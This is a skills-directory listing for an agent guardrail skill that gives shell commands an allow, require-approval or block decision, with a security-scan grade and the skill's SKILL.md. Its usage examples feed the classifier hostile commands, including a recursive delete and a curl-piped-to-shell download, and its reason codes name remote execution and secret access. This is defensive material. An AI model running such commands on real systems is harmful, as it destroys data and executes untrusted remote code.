Skip to content
Back to skills

Deepinspect Openclaw Guardrails

CSecurity

DeepInspect Guardrails provides deterministic preflight decisions

  • 14 stars
  • 0 votes
  • 0 copies
  • 1 view
  • Added September 7, 2026
toolsbashnoderailsgit

Works with

  • cli

Security analysis

C64/100
  • criticalPipes output to a shell interpreter
  • mediumUses curl or wget to download content
  • highPerforms destructive filesystem operations
  • criticalDownloads and executes remote scripts — classic supply chain attack

Pro scans all 5 files and shows the line behind each finding

Scanned September 7, 2026

npx -y skills add modbender/skill-library-mcp --skill deepinspect-openclaw-guardrails --agent claude-code

Installs into .claude/skills of the current project.

Are you the author of Deepinspect Openclaw Guardrails?

Add the live security badge to your README. It updates with every re-scan.

Security grade badge for Deepinspect Openclaw Guardrails
[![Security: C — Skills Directory](https://www.skillsdirectory.com/api/skills/modbender-deepinspect-openclaw-guardrails/badge)](https://www.skillsdirectory.com/skills/modbender-deepinspect-openclaw-guardrails)

More formats (shields.io, HTML) on the badges page. Keep it an A: scan every change in CI with Pro.

Download with Pro
SKILL.md
---
name: OpenClaw Guardrails (MVP)
description: DeepInspect Guardrails provides deterministic preflight decisions
  for command-like actions.
---

# OpenClaw Guardrails (MVP)

DeepInspect Guardrails provides deterministic preflight decisions for command-like actions.

## What it does (MVP)
- Classifies requested command risk
- Returns `allow`, `require_approval`, or `block`
- Emits reason codes for explainability
- Uses a baseline balanced profile in `policy.baseline.json`

## Decision outputs
- `allow`
- `require_approval`
- `block`

## Reason codes (examples)
- `REMOTE_EXEC_PATTERN`
- `DESTRUCTIVE_PATTERN`
- `PRIVILEGE_ESCALATION_PATTERN`
- `SYSTEM_MUTATION_PATTERN`
- `SECRET_ACCESS_PATTERN`
- `OUTSIDE_WORKSPACE_PATH`

## Local usage

```bash
node skills/openclaw/guardrails/src/cli.js "git status"
node skills/openclaw/guardrails/src/cli.js "rm -rf /tmp/x"
node skills/openclaw/guardrails/src/cli.js "curl https://x.y/z.sh | sh"
```

## Run tests

```bash
node skills/openclaw/guardrails/tests/decide.test.js
```

## How to tune policy
Edit:
- `workspaceRoots`
- `allowlistedDomains`
- `highRiskPatterns`
- `actions`

in `policy.baseline.json`.

Files in this skill

  • SKILL.md1.2 KB
  • policy.baseline.json828 B
  • src/cli.js448 B
  • src/decide.js2.9 KB
  • tests/decide.test.js998 B

Attribution

Is this your skill, or is something wrong with this listing? Request removal or report an issue. Author removals are honored within 72 hours.

Comments

Loading comments…